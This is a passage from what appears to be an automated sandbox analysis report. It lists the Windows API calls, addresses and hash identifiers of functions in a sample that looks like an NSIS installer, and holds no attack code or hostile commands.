                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: *B$ A$ A$... %d%%
                                                          • API String ID: 551687249-3485722521
                                                          • Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                          • Instruction ID: 3a086bfa1ae904988031f2e91e2ff9394e13111a018eeb379290de00703e2b75
                                                          • Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                          • Instruction Fuzzy Hash: 2F519F71900219DBCB11DF65DA44B9E7FB8AF44766F10413BE810BB2D1C7789A40CBA9
                                                          Function 0040455D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                          • GetSysColor.USER32(00000000), ref: 004045B8
                                                          • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                          • SetBkMode.GDI32(?,?), ref: 004045D0
                                                          • GetSysColor.USER32(?), ref: 004045E3
                                                          • SetBkColor.GDI32(?,?), ref: 004045F3
                                                          • DeleteObject.GDI32(?), ref: 0040460D
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                          Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                            • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction ID: d1aefac9689752b6b3ea6a4f87dd4281ecbe68d6f3974aa7f4e2ef829afcd0bd
                                                          • Opcode Fuzzy Hash: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction Fuzzy Hash: 66510C75D04119AADF20EFD4CA85AAEBBB9FF44304F14817BE501B62D0D7B89D828B58
                                                          Function 004055FC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,74DF23A0), ref: 00405657
                                                          • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction ID: 60923f6e922cea494a698f26c75bee70e53a21f42b4b77269416c2a585f1ce57
                                                          • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction Fuzzy Hash: 9A21A171900258BACB119FA5ED449DFBFB4EF45310F50843AF908B22A0C3794A40CFA8
                                                          Function 00404EB1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                          • GetMessagePos.USER32 ref: 00404ED4
                                                          • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                          Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00403001
                                                          • wsprintfW.USER32 ref: 00403011
                                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040300B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                          • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                          Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                          • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                          • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                          • Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                          • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                          Function 00406825 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction ID: bedb2e6347f460b6a244a356934bd0223db9426f0f89d28790e15ec7ef568a4f
                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction Fuzzy Hash: C911B66780221295DB303B148C40A7762A8AF59754F56C43FED86732C0E77C5C9282AD
                                                          Function 004068FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                          • wsprintfW.USER32 ref: 0040694D
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME
                                                          • API String ID: 2200240437-1106614640
                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction ID: 6d7bab0cfc2d48cbbbe6bb2f91b005b1c0391479526b60628745523d5c0137a7
                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction Fuzzy Hash: 66F02B71501129A7CF10AB68DD0EF9F376CAB00304F10447AA646F10E0EB7CDB69CB98
                                                          Function 00401794 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017D5
                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017FA
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: 99b6416810ddb5753ad8509ba94df8da2a36f778d9381ab1a10acee0bad54b07
                                                          • Instruction ID: 896c0c78208a39cbb5dd39340d0745d1a2bf2ace5f7797069eceb710e9101d93
                                                          • Opcode Fuzzy Hash: 99b6416810ddb5753ad8509ba94df8da2a36f778d9381ab1a10acee0bad54b07
                                                          • Instruction Fuzzy Hash: 4C41B671900108BACB117BB5DD85DBE7AB9EF45328F21423FF412B10E2D73C8A919A2D
                                                          Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction ID: 446d876c474c9d83549856ad9cac23e68bb7371358ae7480bd0e7fa7c4692e5e
                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction Fuzzy Hash: 1D212A7150010ABFDF129F90CE89EEF7A7DEB54388F110076B909B21E0E7B58E54AA64
                                                          Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                          • GetClientRect.USER32(?,?), ref: 00401E0A
                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                          • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                          Function 00401E73 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E76
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                          • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                          • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
                                                          Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                          • Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
                                                          • Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                          • Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
                                                          Function 00404DA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • wsprintfW.USER32 ref: 00404E4D
                                                          • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                          • Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
                                                          • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                          • Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
                                                          Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000,0040321C,00000001), ref: 00403051
                                                          • GetTickCount.KERNEL32 ref: 0040306F
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
